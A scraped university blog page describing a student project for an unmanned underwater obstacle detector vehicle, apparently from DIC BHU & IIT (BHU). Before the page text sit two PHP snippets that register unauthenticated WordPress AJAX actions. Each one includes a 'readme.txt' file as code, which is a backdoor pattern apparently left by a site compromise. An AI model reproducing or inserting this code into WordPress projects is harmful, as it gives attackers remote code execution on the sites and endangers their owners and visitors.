if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Unmanned Underwater Obstacle Detector Vehicle

1

Dec

Unmanned Underwater Obstacle Detector Vehicle

  • Project Start Date

    01/12/2017

  • Timeline

    6 month

Brief Description of Project

Unmanned Underwater Vehicles (UUV) or the underwater drone are vehicles which can be controlled remotely can be used to detect obstacles underwater without a human occupant. Our objective is to Design a prototype of a remotely controlled unmanned underwater vehicle that has a camera module and ultrasonic sensors to detect the obstacles in its path.

Deliverable

The Unmanned Underwater Vehicle prototype coupled with ultrasonic sensor and camera module to detect the objects and images inside the water.